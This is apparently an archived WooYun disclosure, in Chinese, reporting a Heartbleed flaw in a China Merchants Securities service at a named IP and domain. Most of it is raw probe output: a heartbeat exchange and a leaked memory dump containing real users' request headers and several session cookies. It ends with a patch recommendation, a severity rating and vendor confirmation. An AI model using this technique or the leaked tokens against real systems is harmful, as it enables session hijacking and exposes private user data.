乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-07: 细节已通知厂商并且等待厂商处理中 2015-07-07: 厂商已经确认,细节仅向厂商公开 2015-07-17: 细节向核心白帽子及相关领域专家公开 2015-07-27: 细节向普通白帽子公开 2015-08-06: 细节向实习白帽子公开 2015-08-21: 细节向公众公开
招商证券某服务存在心脏滴血漏洞
ip: 210.21.232.117 对应域名: kh.newone.com.cn
Connecting...Sending Client Hello...Waiting for Server Hello... ... received message: type = 22, ver = 0302, length = 58 ... received message: type = 22, ver = 0302, length = 3902 ... received message: type = 22, ver = 0302, length = 525 ... received message: type = 22, ver = 0302, length = 4Sending heartbeat request... ... received message: type = 24, ver = 0302, length = 16384Received heartbeat response:[email protected][...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#.r-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322; .NET CLR 2.0.50727)..Host: kh.newone.com.cn..Connection: Keep-Alive..Cookie: PLAY_SESSION=e9e139febb2c06888ddd2c26a86bc656143f7435-%00___ID%3A56cafc67-394d-4623-b850-6bf4e650c7db%00....dR..4..u..<..4%00.zn.+D.~.;.6=108..Cache-Control: max-age=0..Accept-Language: zh-cnZ..pN..i...n.Y.....V.*.W'.B....ie-Match: "1430285244000-91259055"..If-Modified-Since: Wed, 29 Apr 2015 05:27:24 GMT.GF..c.....g...4.{...R...H][email protected][...r....+..H...9..w.3....f.....".!.9.8...5.....3.2.....E.D...../...A...I.....4.2...#.ttp://www.lenovomobile.com/admin/module/product/DownFile/Lenovo_P770_UAProfile.xml..X-Requested-With: com.android.browser..User-Agent: Mozilla/5.0 (Linux; U; Android 4.1; zh-cn; Lenovo-P770/S100) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.1 Mobile Safari/534.30..Accept-Encoding: gzip,deflate..Accept-Language: zh-CN, en-US..Accept-Charset: utf-8, utf-16, *;q=0.7..Cookie: PLAY_FLASH=; PLAY_ERRORS=; PLAY_SESSION=a8035aaf0b9650299cc093fac9d7e6c3e334155d-%00___ID%3A0399648f-f2d9-486f-960b-4e7fb80fb170%00....o.jd.U;.Z.U ..3....(Cookie: PLAY_SESSION=cc47ef06f8903f21bd69e50ae6c0e2fb2a2c8c18-%00___ID%3A3172654b-b83a-4caf-80c8-c973c80e3848%00Cookie: PLAY_FLASH=; PLAY_ERRORS=; PLAY_SESSION=68be5f56e8cedfdaf1f2df63bced213ed5600ec5-%00___ID%3A84380cdc-7168-4282-92e6-a070b2ad4707%00Cookie: PLAY_SESSION=2f2823a0e3162f286443c2508290209c5876e36b-%00___ID%3A01fee1cd-1bac-4b97-b38c-2208c50298fa%00Cookie: CNZZDATA5717826=cnzz_eid%3D436430477-1436229992-https%253A%252F%252Fkh.newone.com.cn%252F%26ntime%3D1436229992; PLAY_SESSION=6d943f5e3541cfc37f7ac3f41dc793adfb0bd842-%00___ID%3A9f02ba4d-486e-408d-968c-2d36123ed093%00
打补丁或者升级到最新版本
危害等级:中
漏洞Rank:8
确认时间:2015-07-07 18:12
谢谢,我们会尽快修复
暂无